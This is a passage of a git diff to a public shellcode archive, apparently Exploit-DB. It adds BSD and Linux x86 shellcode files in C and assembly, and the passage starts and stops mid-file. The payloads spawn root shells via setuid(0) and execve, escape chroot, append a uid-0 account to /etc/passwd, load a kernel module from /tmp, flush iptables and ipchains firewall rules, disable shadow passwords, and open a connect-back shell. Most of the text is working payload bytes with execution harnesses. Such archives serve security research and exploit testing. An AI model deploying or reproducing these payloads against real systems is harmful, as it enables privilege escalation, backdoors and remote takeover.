cl,0x1e +main_loop: + dec cl + inc byte [esp+ecx] + dec cl + loop main_loop + push esp + mov al,0x3d + push eax + int 0x80 + +*/ +char shellcode[] = + "\x31\xc9\x31\xc0\x50\xb0\x17\x50\xcd\x80\x51\xb1\x1e\x6a\x2e" + "\xe2\xfc\xb1\x1e\xfe\xc9\xfe\x04\x0c\xfe\xc9\xe2\xf7\x54\xb0" + "\x3d\x50\xcd\x80"; + +int +main(void) +{ + int *ret; + ret = (int*)&ret + 2; + (*ret) = shellcode; +} \ No newline at end of file diff --git a/shellcodes/bsd_x86/43635.c b/shellcodes/bsd_x86/43635.c new file mode 100644 index 000000000..c432dccc1 --- /dev/null +++ b/shellcodes/bsd_x86/43635.c @@ -0,0 +1,39 @@ +/* One of the smallest chroot shellcodes in the !!world!! + it will put '../' 10 times + Size 28 bytes + OS *BSD + /rootteam/dev0id (rootteam.void.ru) + dev0id@uncompiled.com + +BITS 32 + + xor ecx,ecx + xor eax,eax + push ecx + mov cl,0x1e +main_push: + push byte 0x2e + loop main_push + mov cl,0x1e +main_loop: + dec cl + inc byte [esp+ecx] + dec cl + loop main_loop + push esp + mov al,0x3d + push eax + int 0x80 + +*/ +char shellcode[] = + "\x31\xc9\x31\xc0\x51\xb1\x1e\x6a\x2e\xe2\xfc\xb1\x1e\xfe\xc9" + "\xfe\x04\x0c\xfe\xc9\xe2\xf7\x54\xb0\x3d\x50\xcd\x80"; + +int +main(void) +{ + int *ret; + ret = (int*)&ret + 2; + (*ret) = shellcode; +} \ No newline at end of file diff --git a/shellcodes/bsd_x86/43636.c b/shellcodes/bsd_x86/43636.c new file mode 100644 index 000000000..0acde29c7 --- /dev/null +++ b/shellcodes/bsd_x86/43636.c @@ -0,0 +1,48 @@ +/* One of the smallest chroot shellcodes + it will put '../' 10 times + Size 40 bytes + OS *BSD + /rootteam/dev0id (rootteam.void.ru) + dev0id@uncompiled.com + + +BITS 32 + +jmp short callme +main: + pop esi + mov edi,esi + xor ecx,ecx + xor eax,eax + push eax + mov cl,0x1e + mov al,0x2e + repne stosb + pop eax + stosb + mov cl,0x1e +main_loop: + dec cl + inc byte [esi+ecx] + dec cl + loop main_loop + push esi + mov al,0x3d + push eax + int 0x80 +callme: + call main +*/ + +char shellcode[] = + "\xeb\x21\x5e\x89\xf7\x31\xc9\x31\xc0\x50\xb1\x1e\xb0\x2e\xf2" + "\xaa\x58\xaa\xb1\x1e\xfe\xc9\xfe\x04\x0e\xfe\xc9\xe2\xf7\x56" + "\xb0\x3d\x50\xcd\x80\xe8\xda\xff\xff\xff"; + +int +main(void) +{ + int *ret; + ret = (int*)&ret + 2; + (*ret) = shellcode; +} \ No newline at end of file diff --git a/shellcodes/bsd_x86/43640.c b/shellcodes/bsd_x86/43640.c new file mode 100644 index 000000000..1e2922914 --- /dev/null +++ b/shellcodes/bsd_x86/43640.c @@ -0,0 +1,47 @@ +/*The shellcode calls the symlink() and makes the + link to the /bin/sh in the current dir. + size = 39 bytes + OS = *BSD + written by /rootteam/dev0id (rootteam.void.ru) + + +BITS 32 +jmp short callme +main: + pop esi + xor eax,eax + mov byte [esi+7],al + mov byte [esi+10],al + lea ebx,[esi+8] + push ebx + lea ebx,[esi] + push ebx + mov al,57 + push eax + int 0x80 + +callme: + call main + db '/bin/sh#sh#' +*/ + +char shellcode[] = + "\xeb\x15\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x8d\x5e\x08\x53" + "\x8d\x1e\x53\xb0\x39\x50\xcd\x80\xe8\xe6\xff\xff\xff\x2f\x62" + "\x69\x6e\x2f\x73\x68\x23\x73\x68\x23"; + + + + + + + +int +main (void) +{ + void (*code)(void); + code=(void(*)())shellcode; + (void)code(); + return 0; + +} \ No newline at end of file diff --git a/shellcodes/bsd_x86/43642.c b/shellcodes/bsd_x86/43642.c new file mode 100644 index 000000000..177dd4fde --- /dev/null +++ b/shellcodes/bsd_x86/43642.c @@ -0,0 +1,58 @@ +/************************************************************* +writes the line for user in /etc/passwd with uid&gid == 0 +OS: *BSD +length: 74 + written by dev0id dev0id@mail.ru (rootteam.void.ru) + #rus-sec /Efnet.org +greetz: + mig + nerf + +************************************************************* +BITS 32 +main: + xor eax,eax + push eax + push byte 0x64 + push word 0x7773 + push long 0x7361702f + push long 0x6374652f + mov ebx,esp + mov al,0x0a + push eax + push ebx + mov al,5 + push eax + int 0x80 + + + mov edx,eax + + push long 0x0a206873 + push long 0x2f6e6962 + push long 0x2f3a2f3a + push long 0x313a303a + push long 0x303a3a31 + mov ebx,esp + mov al,20 + push eax + push ebx + push edx + mov al,4 + push eax + int 0x80 + + mov al,1 + push eax + int 0x80 + +************************************************************* + + + +char shellcode[] = + "\x31\xc0\x50\x6a\x64\x66\x68\x73\x77\x68\x2f\x70\x61\x73\x68" + "\x2f\x65\x74\x63\x89\xe3\xb0\x0a\x50\x53\xb0\x05\x50\xcd\x80" + "\x89\xc2\x68\x73\x68\x20\x0a\x68\x62\x69\x6e\x2f\x68\x3a\x2f" + "\x3a\x2f\x68\x3a\x30\x3a\x31\x68\x31\x3a\x3a\x30\x89\xe3\xb0" + "\x14\x50\x53\x52\xb0\x04\x50\xcd\x80\xb0\x01\x50\xcd\x80"; \ No newline at end of file diff --git a/shellcodes/bsd_x86/43644.asm b/shellcodes/bsd_x86/43644.asm new file mode 100644 index 000000000..4271acc44 --- /dev/null +++ b/shellcodes/bsd_x86/43644.asm @@ -0,0 +1,50 @@ +/* +simply execve_binsh+seteuid(0) shellcode in 31 bytes +written on nasm - my first nasm exp. +greetz2: + mig #darknet /EFnet.org + nerf #nerf /EFnet.org + dev0id #rus-sec /EFnet.org (rootteam.void.ru) +*/ + +char shellcode[] = + "\x31\xc0\x50\xb0\xb7\xcd\x80\x50\x31\xc0\x50\x68\x2f\x2f\x73" + "\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd" + "\x80"; +void +main() +{ + int *ret; + ret=(int*)&ret+2; + (*ret)=(int)shellcode; +} + +/**************************************** +--------------start--------------------- +BITS 32 + +main: + xor eax,eax + push eax + mov al,183 + int 0x80 + push eax + xor eax,eax + push eax + push long 0x68732f2f + push long 0x6e69622f + mov ebx,esp + push eax + push esp + push ebx + mov al,59 + push eax + int 0x80 + + ;mov al,1 need exit? I do not! + ;push eax + ;int 0x80 +---------------end---------------------- +compilation: + %nasm code.s -o code +****************************************/ \ No newline at end of file diff --git a/shellcodes/bsd_x86/43645.asm b/shellcodes/bsd_x86/43645.asm new file mode 100644 index 000000000..16168a480 --- /dev/null +++ b/shellcodes/bsd_x86/43645.asm @@ -0,0 +1,46 @@ +/* +simply execve_binsh shellcode in 28 bytes +written on nasm - my first nasm exp. +greetz2: + mig #darknet /EFnet.org + dev0id #rus-sec /EFnet.org (rootteam.void.ru) +*/ +char shellcode[] = + "\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50\x56\xb0\x3b\x50\xcd" + "\x80\xe8\xed\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; + +void +main() +{ + int *ret; + ret=(int*)&ret+2; + (*ret)=(int)shellcode; +} + +/**************************************** +nasm code is: +---------------start-------------------- +BITS 32 + +jmp short path +main: + pop esi + xor eax,eax + mov byte [esi+7],al + push eax + push eax + push esi + mov al,59 + push eax + int 0x80 + + ;mov al,1 need ? I do not! + ;push eax + ;int 0x80 +path: + call main + db '/bin/sh' +---------------end---------------------- +compilation: + %nasm code.s -o code +****************************************/ \ No newline at end of file diff --git a/shellcodes/linux_x86/13452.c b/shellcodes/linux_x86/13452.c index 52d8e4c31..5d70f6b06 100644 --- a/shellcodes/linux_x86/13452.c +++ b/shellcodes/linux_x86/13452.c @@ -1,47 +1,40 @@ -/* The setuid(0)+chroot() shellcode. It is the one of the smallest shellcodes +/* The chroot() shellcode. It is the one of the smallest shellcodes in the !!world!! it will put '../' 10 times - Size 34 bytes - OS *BSD - /rootteam/dev0id (www.sysworld.net) + Size 28 bytes + OS Linux + /rootteam/dev0id (rootteam.void.ru) dev0id@uncompiled.com BITS 32 - +main: xor ecx,ecx xor eax,eax - push eax - mov al,0x17 - push eax - int 0x80 push ecx - mov cl,0x1e + mov cl,30 main_push: push byte 0x2e loop main_push - mov cl,0x1e -main_loop: + mov cl,30 +main_inc: dec cl inc byte [esp+ecx] dec cl - loop main_loop - push esp - mov al,0x3d - push eax + loop main_inc + mov ebx,esp + mov al,61 int 0x80 -*/ -char shellcode[] = - "\x31\xc9\x31\xc0\x50\xb0\x17\x50\xcd\x80\x51\xb1\x1e\x6a\x2e" - "\xe2\xfc\xb1\x1e\xfe\xc9\xfe\x04\x0c\xfe\xc9\xe2\xf7\x54\xb0" - "\x3d\x50\xcd\x80"; +*/ + +char shellcode[] = + "\x31\xc9\x31\xc0\x51\xb1\x1e\x6a\x2e\xe2\xfc\xb1\x1e\xfe\xc9" + "\xfe\x04\x0c\xfe\xc9\xe2\xf7\x89\xe3\xb0\x3d\xcd\x80"; int main(void) { int *ret; ret = (int*)&ret + 2; (*ret) = shellcode; -} - -// milw0rm.com [2004-09-12] \ No newline at end of file +} \ No newline at end of file diff --git a/shellcodes/linux_x86-64/13670.c b/shellcodes/linux_x86/13670.c similarity index 100% rename from shellcodes/linux_x86-64/13670.c rename to shellcodes/linux_x86/13670.c diff --git a/shellcodes/linux/14234.c b/shellcodes/linux_x86/14234.c similarity index 100% rename from shellcodes/linux/14234.c rename to shellcodes/linux_x86/14234.c diff --git a/shellcodes/linux/14276.c b/shellcodes/linux_x86/14276.c similarity index 100% rename from shellcodes/linux/14276.c rename to shellcodes/linux_x86/14276.c diff --git a/shellcodes/linux_x86/43626.c b/shellcodes/linux_x86/43626.c new file mode 100644 index 000000000..ca943732d --- /dev/null +++ b/shellcodes/linux_x86/43626.c @@ -0,0 +1,9 @@ +unsigned char scode[] = +"\x29\xc9\x83\xe9\xe9\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfd" +"\x96\x34\xe4\x83\xeb\xfc\xe2\xf4\xcc\x5f\xbd\x2f\x97\xd0\x6c\x29" +"\x7d\xfc\x31\xbc\xcc\x5f\x65\x8c\x8e\xe5\x43\x80\x95\xb9\x1b\x94" +"\x9c\xfe\x1b\x81\x89\xf5\xbd\x07\xbc\x23\x30\x29\x7d\x05\xdc\xc6" +"\xfd\x96\x34\x90\xcd\xa6\x46\xde\xbc\xd7\x6d\xaf\xaa\xc0\x5e\xb6" +"\xb1\xa0\x5e\x8f\xb4\xac\x04\xde\xcd\xac\x0e\xcb\xc7\xb9\x56\x8d" +"\x93\xb9\x47\x8c\xf7\xcf\xbf\xb5\x01\xfc\x30\xbc\x30\x16\x5e\xe5" +"\xa5\x5b\xb4\xe4"; \ No newline at end of file diff --git a/shellcodes/linux_x86/43630.c b/shellcodes/linux_x86/43630.c new file mode 100644 index 000000000..3cc4dc71b --- /dev/null +++ b/shellcodes/linux_x86/43630.c @@ -0,0 +1,48 @@ +/* The shellcode sets uid == 0 and loads the kernel module from /tmp/o.o + + size = 67 bytes + OS = Linux i386 + written by /rootteam/dev0id (rootteam.void.ru) + dev0id@uncompiled.com + +BITS 32 + +jmp short callme +main: + pop esi + xor eax,eax + xor ebx,ebx + mov al,23 + int 0x80 + mov byte [esi+12],al + mov byte [esi+21],al + mov long [esi+22],esi + lea ebx,[esi+13] + mov long [esi+26],ebx + mov long [esi+30],eax + mov al,0x0b + mov ebx,esi + lea ecx,[esi+22] + lea edx,[esi+30] + int 0x80 + + +callme: + call main + db '/sbin/insmod#/tmp/o.o' +*/ + +char shellcode[] = + "\xeb\x27\x5e\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x88\x46\x0c\x88" + "\x46\x15\x89\x76\x16\x8d\x5e\x0d\x89\x5e\x1a\x89\x46\x1e\xb0" + "\x0b\x89\xf3\x8d\x4e\x16\x8d\x56\x1e\xcd\x80\xe8\xd4\xff\xff" + "\xff\x2f\x73\x62\x69\x6e\x2f\x69\x6e\x73\x6d\x6f\x64\x23\x2f" + "\x74\x6d\x70\x2f\x6f\x2e\x6f"; +int +main() +{ + + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int)shellcode; +} \ No newline at end of file diff --git a/shellcodes/linux_x86/43631.c b/shellcodes/linux_x86/43631.c new file mode 100644 index 000000000..204b4ce4b --- /dev/null +++ b/shellcodes/linux_x86/43631.c @@ -0,0 +1,50 @@ +/* The setuid(0)+chroot() shellcode. It is the one of the smallest shellcodes + in the !!world!! + it will put '../' 10 times + Size 34 bytes + OS Linux + /rootteam/dev0id (rootteam.void.ru) + dev0id@uncompiled.com + +BITS 32 +main: + xor ecx,ecx + xor eax,eax + xor ebx,ebx + mov al,23 + int 0x80 + push ecx + mov cl,30 +main_push: + push byte 0x2e + loop main_push + mov cl,30 +main_inc: + dec cl + inc byte [esp+ecx] + dec cl + loop main_inc + mov ebx,esp + mov al,61 + int 0x80 + + + + + + + + +*/ + +char shellcode[] = + "\x31\xc9\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x51\xb1\x1e\x6a\x2e" + "\xe2\xfc\xb1\x1e\xfe\xc9\xfe\x04\x0c\xfe\xc9\xe2\xf7\x89\xe3" + "\xb0\x3d\xcd\x80"; +int +main(void) +{ + int *ret; + ret = (int*)&ret + 2; + (*ret) = shellcode; +} \ No newline at end of file diff --git a/shellcodes/linux_x86/43637.c b/shellcodes/linux_x86/43637.c new file mode 100644 index 000000000..215b117f2 --- /dev/null +++ b/shellcodes/linux_x86/43637.c @@ -0,0 +1,52 @@ +/* The shellcode flushs the iptables by running /sbin/iptables -F + then exit() + greetz to zilion: man, my code is shorter! + + size = 64 bytes + OS = Linux i386 + written by /rootteam/dev0id (rootteam.void.ru) + + +BITS 32 + +jmp short callme +main: + pop esi + xor eax,eax + mov byte [esi+14],al + mov byte [esi+17],al + mov long [esi+18],esi + lea ebx,[esi+15] + mov long [esi+22],ebx + mov long [esi+26],eax + mov al,0x0b + mov ebx,esi + lea ecx,[esi+18] + lea edx,[esi+26] + int 0x80 + mov al,0x01 + xor ebx,ebx + int 0x80 + + +callme: + call main + db '/sbin/iptables#-F#' +*/ + + +char shellcode[] = + "\xeb\x27\x5e\x31\xc0\x88\x46\x0e\x88\x46\x11\x89\x76\x12\x8d" + "\x5e\x0f\x89\x5e\x16\x89\x46\x1a\xb0\x0b\x89\xf3\x8d\x4e\x12" + "\x8d\x56\x1a\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xd4\xff\xff" + "\xff\x2f\x73\x62\x69\x6e\x2f\x69\x70\x74\x61\x62\x6c\x65\x73" + "\x23\x2d\x46\x23"; + + +int main() +{ + + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int)shellcode; +} \ No newline at end of file diff --git a/shellcodes/linux_x86/43638.c b/shellcodes/linux_x86/43638.c new file mode 100644 index 000000000..00ae78a49 --- /dev/null +++ b/shellcodes/linux_x86/43638.c @@ -0,0 +1,52 @@ +/* The shellcode flushs the ipchains table by running /sbin/ipchains -F + then exit() + greetz to zilion: man, my code is shorter! + + size = 64 bytes + OS = Linux i386 + written by /rootteam/dev0id (rootteam.void.ru) + + +BITS 32 + +jmp short callme +main: + pop esi + xor eax,eax + mov byte [esi+14],al + mov byte [esi+17],al + mov long [esi+18],esi + lea ebx,[esi+15] + mov long [esi+22],ebx + mov long [esi+26],eax + mov al,0x0b + mov ebx,esi + lea ecx,[esi+18] + lea edx,[esi+26] + int 0x80 + mov al,0x01 + xor ebx,ebx + int 0x80 + + +callme: + call main + db '/sbin/ipchains#-F#' +*/ + + +char shellcode[] = + "\xeb\x27\x5e\x31\xc0\x88\x46\x0e\x88\x46\x11\x89\x76\x12\x8d" + "\x5e\x0f\x89\x5e\x16\x89\x46\x1a\xb0\x0b\x89\xf3\x8d\x4e\x12" + "\x8d\x56\x1a\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xd4\xff\xff" + "\xff\x2f\x73\x62\x69\x6e\x2f\x69\x70\x63\x68\x61\x69\x6e\x73" + "\x23\x2d\x46\x23"; + + +int main() +{ + + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int)shellcode; +} \ No newline at end of file diff --git a/shellcodes/linux_x86/43639.c b/shellcodes/linux_x86/43639.c new file mode 100644 index 000000000..6b69ce500 --- /dev/null +++ b/shellcodes/linux_x86/43639.c @@ -0,0 +1,47 @@ +/* The shellcode flushs the ipchains table by running /sbin/ipchains -F + no exit() + greetz to zilion: man, my code is shorter! + + size = 58 bytes + OS = Linux i386 + written by /rootteam/dev0id (rootteam.void.ru) + + +BITS 32 + +jmp short callme +main: + pop esi + xor eax,eax + mov byte [esi+14],al + mov byte [esi+17],al + mov long [esi+18],esi + lea ebx,[esi+15] + mov long [esi+22],ebx + mov long [esi+26],eax + mov al,0x0b + mov ebx,esi + lea ecx,[esi+18] + lea edx,[esi+26] + int 0x80 + + +callme: + call main + db '/sbin/ipchains#-F#' +;*/ + +char shellcode[] = + "\xeb\x21\x5e\x31\xc0\x88\x46\x0e\x88\x46\x11\x89\x76\x12\x8d" + "\x5e\x0f\x89\x5e\x16\x89\x46\x1a\xb0\x0b\x89\xf3\x8d\x4e\x12" + "\x8d\x56\x1a\xcd\x80\xe8\xda\xff\xff\xff\x2f\x73\x62\x69\x6e" + "\x2f\x69\x70\x63\x68\x61\x69\x6e\x73\x23\x2d\x46\x23"; + + +int main() +{ + + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int)shellcode; +} \ No newline at end of file diff --git a/shellcodes/linux_x86/43641.c b/shellcodes/linux_x86/43641.c new file mode 100644 index 000000000..167bc6455 --- /dev/null +++ b/shellcodes/linux_x86/43641.c @@ -0,0 +1,59 @@ +/*The shellcode calls the symlink() and makes the + link to the /bin/sh in the current dir. + size = 36 bytes + OS = Linux i386 + written by /rootteam/dev0id (rootteam.void.ru) + + + + BITS 32 + +jmp short callit + +doit: + +pop esi +xor eax,eax +mov byte [esi+7],al +mov byte [esi+10],al +mov byte al,83 +lea ebx,[esi] +lea ecx,[esi+8] +int 0x80 + + +callit: +call doit + +db '/bin/sh#sh#' +*/ + +char shellcode[]= +"\xEB\x12" +"\x5E" +"\x31\xC0" +"\x88\x46\x07" +"\x88\x46\x0A" +"\xB0\x53" +"\x8D\x1E\x8D\x4E" +"\x08\xCD" +"\x80\xE8\xE9" +"\xFF" +"\xFF" +"\xFF\x2F" +"\x62\x69\x6E" +"\x2F" +"\x73\x68" +"\x23\x73\x68" +"\x23"; + + +int +main (void) +{ + void (*code)(void); + code=(void(*)())shellcode; + (void)code(); + return 0; + +} \ No newline at end of file diff --git a/shellcodes/linux_x86/43643.c b/shellcodes/linux_x86/43643.c new file mode 100644 index 000000000..b05fa1547 --- /dev/null +++ b/shellcodes/linux_x86/43643.c @@ -0,0 +1,56 @@ +/************************************************************* +This shellcode writes to /etc/passwd the string for the user +with uid&gid == 0; + written by dev0id dev0id@mail.ru (rootteam.void.ru) + #rus-sec /Efnet.org +greetz: + nerf + w00w00 +************************************************************* + +BITS 32 +jmp short path +main: + pop esi + xor eax,eax + push eax + mov byte [esi+11],al + mov al,0x0a + push eax + push esi + mov al,5 + push eax + int 0x80 + + + mov edx,eax + + push long 0x0a206873 + push long 0x2f6e6962 + push long 0x2f3a2f3a + push long 0x313a303a + push long 0x303a3a31 + mov ebx,esp + mov al,20 + push eax + push ebx + push edx + mov al,4 + push eax + int 0x80 + + mov al,1 + push eax + int 0x80 +path: + call main + db "/etc/passwd#" + +********************************************************************/ +char shellcode[] = + "\xeb\x3c\x5e\x31\xc0\x50\x88\x46\x0b\xb0\x0a\x50\x56\xb0\x05" + "\x50\xcd\x80\x89\xc2\x68\x73\x68\x20\x0a\x68\x62\x69\x6e\x2f" + "\x68\x3a\x2f\x3a\x2f\x68\x3a\x30\x3a\x31\x68\x31\x3a\x3a\x30" + "\x89\xe3\xb0\x14\x50\x53\x52\xb0\x04\x50\xcd\x80\xb0\x01\x50" + "\xcd\x80\xe8\xbf\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73" + "\x73\x77\x64\x23"; \ No newline at end of file diff --git a/shellcodes/linux_x86/43646.c b/shellcodes/linux_x86/43646.c new file mode 100644 index 000000000..f92bfb5d2 --- /dev/null +++ b/shellcodes/linux_x86/43646.c @@ -0,0 +1,88 @@ +/* +Connecting shellcode written by lamagra +http://lamagra.seKure.de + +May 2000 + +.file "connect" +.version "01.01" +.text + .align 4 +_start: + #socket(AF_INET,SOCK_STREAM,IPPROTO_IP); + movl %esp,%ebp + xorl %edx,%edx + movb $102,%edx + movl %edx,%eax # 102 = socketcall + xorl %ecx,%ecx + movl %ecx,%ebx + incl %ebx # socket() + movl %ebx, -8(%ebp) # 1 = SOCK_STREAM + incl %ebx + movl %ebx, -12(%ebp) # 2 = AF_INET + decl %ebx # 1 = SYS_socket + movl %ecx, -4(%ebp) # 0 = IPPROTO_IP + leal -12(%ebp),%ecx # put args in correct place + int $0x80 # switch to kernel-mode + xorl %ecx,%ecx + movl %eax,-12(%ebp) # save the fd + + # connect(fd,(struct sockaddr *)&struct,16); + incl %ebx + movw %ebx,-20(%ebp) # 2 = PF_INET + movw $9999,-18(%ebp) # 9999 = htons(3879); + movl $0x100007f,-16(%ebp) # htonl(IP) + leal -20(%ebp),%eax # struct sockaddr + movl %eax,-8(%ebp) # load the struct + movb $16,-4(%ebp) # 16 = sizeof(sockaddr) + movl %edx,%eax # 102 = socketcall + incl %ebx # 3 = SYS_connect + leal -12(%ebp),%ecx # put args in place + int $0x80 # call socketcall() + + # dup2(fd,0-1-2) + xorl %ecx,%ecx + movb $63,%eax # 63 = dup2() + int $0x80 + incl %ecx + cmpl $3,%ecx + jne -0xa + + # arg[0] = "/bin/sh" + # arg[1] = 0x0 + # execve(arg[0],arg); + jmp 0x18 + popl %esi + movl %esi,0x8(%ebp) + xorl %eax,%eax + movb %eax,0x7(%esi) + movl %eax,0xc(%ebp) + movb $0xb,%al + movl %esi,%ebx + leal 0x8(%ebp),%ecx + leal 0xc(%ebp),%edx + int $0x80 + call -0x1d + .string "/bin/sh" +*/ + +#define NAME "connecting" + +char code[]= +"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8" +"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89" +"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\xc7\x45\xf0" +"\x7f\x01\x01\x01\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0" +"\x43\x8d\x4d\xf4\xcd\x80\x31\xc9\xb0\x3f\xcd\x80\x41\x83\xf9\x03" +"\x75\xf6\xeb\x18\x5e\x89\x75\x08\x31\xc0\x88\x46\x07\x89\x45\x0c" +"\xb0\x0b\x89\xf3\x8d\x4d\x08\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff" +"\xff/bin/sh"; + + +main() +{ + int (*funct)(); + funct = (int (*)()) code; + printf("%s shellcode\n\tSize = %d\n",NAME,strlen(code)); + (int)(*funct)(); +} \ No newline at end of file diff --git a/shellcodes/linux_x86/43647.c b/shellcodes/linux_x86/43647.c new file mode 100644 index 000000000..b2102a496 --- /dev/null +++ b/shellcodes/linux_x86/43647.c @@ -0,0 +1,96 @@ +/* + + jmp call_w00w00 + +w00w00: + popl %edi + jmp w0w0w + +call_w00w00: + + call w00w00 + +w0w0w: + + # OPEN + # ecx=flag (O_RDONLY, O_WRONLY, ...) + # O_WRONLY | O_APPEND | O_CREAT = 0x441 + # edx=file mode + # ebx=address of filename + # eax=0x05 syscall number + + xorl %ebx,%ebx + movb $(file-w0w0w),%bl + addl %edi,%ebx + + xorb %al,%al + movb %al,11(%ebx) + + xorl %ecx,%ecx + movw $0x441,%cx + + xorl %edx,%edx + movw $00644,%dx + + xorl %eax,%eax + movb $0x5,%al + + int $0x80 + movl %eax,%ebx # save file descriptor to %ebx (for write) + +# WRITE +# ecx=address of buffer to write +# edx=number of bytes to write +# ebx=file descriptor +# eax=0x04 + + xorl %ecx,%ecx + movb $(string-w0w0w),%cl + addl %edi,%ecx + + xorl %edx,%edx + movb $31,%dl + + xorl %eax,%eax + movb $0x04,%al + + int $0x80 + + xorl %eax,%eax + movb $1,%al + int $0x80 + +file: +.ascii "/etc/passwd" +endfile: +.byte 1 +string: +.ascii "w00w00::0:0:w0w0w!:/:/bin/sh\n" + +*/ + +/* + * Source to this is pass.s + * This will append a root line to the passwd file (see the source). + * + * Shok (Matt Conover), shok@dataforce.net + */ + +char shellcode[]= + "\xeb\x03\x5f\xeb\x05\xe8\xf8\xff\xff\xff\x31\xdb\xb3\x35\x01\xfb" + "\x30\xc0\x88\x43\x0b\x31\xc9\x66\xb9\x41\x04\x31\xd2\x66\xba\xa4" + "\x01\x31\xc0\xb0\x05\xcd\x80\x89\xc3\x31\xc9\xb1\x41\x01\xf9\x31" + "\xd2\xb2\x1f\x31\xc0\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x2f" + "\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x01\x77\x30\x30\x77\x30" + "\x30\x3a\x3a\x30\x3a\x30\x3a\x77\x30\x77\x30\x77\x21\x3a\x2f\x3a" + "\x2f\x62\x69\x6e\x2f\x73\x68\x0a"; + +void main() +{ + + int *ret; + + printf("w00w00!\n"); + ret = (int *)&ret + 2; + (*ret) = (int)shellcode; +} \ No newline at end of file diff --git a/shellcodes/linux_x86/43648.c b/shellcodes/linux_x86/43648.c new file mode 100644 index 000000000..840c8d39c --- /dev/null +++ b/shellcodes/linux_x86/43648.c @@ -0,0 +1,32 @@ +#include + +const char sc[]= "\x31\xdb" //xor ebx,ebx + "\x8d\x43\x17" //LEA eax,[ebx + 0x17] /LEA is FASTER than push and pop! + "\x99" //cdq + "\xcd\x80" //int 80 //setuid(0) shouldn't returns -1 right? ;) + "\xb0\x0b" //mov al,0bh + "\x52" //push edx /Termina la cadena con un 0 + "\x68\x63\x6f\x6e\x76" //push dword "conv" + "\x68\x70\x77\x75\x6e" //push dword "pwun" + "\x68\x62\x69\x6e\x2f" //push dword "bin/" + "\x68\x73\x72\x2f\x73" //push dword "sr/s" + "\x68\x2f\x2f\x2f\x75" //push dword "///u" + "\x89\xe3" //mov ebx,esp + "\x89\xd1" //mov ecx,edx + "\xcd\x80"; //int 80h + +void main() +{ + printf("\n~ This shellcode disables shadowing on a linux system ~" + "\n\n\t ~ Coded by vlan7 ~" + "\n\t ~ http://vlan7.blogspot.com ~" + "\n\n ~ Date: 4/Jul/2009" + + "\n\tYou'll have the passwords stored in /etc/passwd." + "\n\tFor undo purposes use the pwconv command." + "\n\t ~ Cheers go to: Wadalbertia" + "\n\t ~ Shellcode Size: %d bytes\n\n", + sizeof(sc)-1); + + (*(void (*)()) sc)(); +} \ No newline at end of file diff --git a/shellcodes/linux_x86/43649.c b/shellcodes/linux_x86/43649.c new file mode 100644 index 000000000..7666ef2a9 --- /dev/null +++ b/shellcodes/linux_x86/43649.c @@ -0,0 +1,28 @@ +#include + +const char sc[]= "\x31\xdb" //xor ebx,ebx + "\x8d\x43\x17" //LEA eax,[ebx + 0x17] /LEA is FASTER tha push/pop + "\x99" //cdq + "\xcd\x80" //int 80 //setuid(0) shouldn't returns -1 right? ;) + "\xb0\x0b" //mov al,0bh + "\x52" //push edx /Termina la cadena //bin/sh con un 0 + "\x68\x6e\x2f\x73\x68" + "\x68\x2f\x2f\x62\x69" + "\x89\xe3" //mov ebx,esp + "\x89\xd1" //mov ecx,edx + "\xcd\x80"; //int 80h + +int main() +{ + printf("\nSMALLEST SETUID & EXECVE GNU/LINUX x86 STABLE SHELLCODE " + "WITHOUT NULLS THAT SPAWNS A SHELL" + "\n\nCoded by vlan7" + "\n\t + vlan7[at]bigfoot.com" + "\n\t + http://vlan7.blogspot.com" + "\n\n[+] Date: 4/Jul/2009" + "\n[+] Thanks to: sch3m4. He initiated the funny game." + "\n\n[+] Shellcode Size: %d bytes\n\n", + sizeof(sc)-1); + (*(void (*)()) sc)(); + return 0; +} \ No newline at end of file diff --git a/shellcodes/linux_x86/43650.c b/shellcodes/linux_x86/43650.c new file mode 100644 index 000000000..557d72729 --- /dev/null +++ b/shellcodes/linux_x86/43650.c @@ -0,0 +1,17 @@ +#include + +const char shellcode[]= + "\x40" // inc %eax +// "\x43" // inc %ebx + "\xcd\x80"; // int $0x80 + +int main() +{ + printf ("\n[+] Yet conditional (%eax==0) Linux/x86 exit(0) 3 bytes or +exit(1) 4 bytes" + "\n[+] Date: 18/06/2009" + "\n[+] Author: TheWorm" + "\n\n[+] Shellcode Size: %d bytes\n\n", sizeof(shellcode)-1); + (*(void (*)()) shellcode)(); + return 0; +} \ No newline at end of file diff --git a/shellcodes/linux_x86/43651.c b/shellcodes/linux_x86/43651.c new file mode 100644 index 000000000..2f37d8d18 --- /dev/null +++ b/shellcodes/linux_x86/43651.c @@ -0,0 +1,27 @@ +#include + +const char shellcode[]= + "\x6a\x17" // push $0x17 + "\x58" // pop %eax + "\x31\xdb" // xor %ebx,%ebx + "\xcd\x80" // int $0x80 + + "\xb0\x0b" // mov $0xb,%al (So you'll get segfault if it's not able +to do the setuid(0). If you don't want this you can write "\x6a\x0b\x58" +instead of "\xb0\x0b", but the shellcode will be 1 byte longer + "\x99" // cltd + "\x52" // push %edx + "\x68\x2f\x2f\x73\x68" // push $0x68732f2f + "\x68\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp,%ebx + "\xcd\x80"; // int $0x80 + +int main() +{ + printf ("\n[+] Linux/x86 setuid(0) & execve(/bin/sh,0)" + "\n[+] 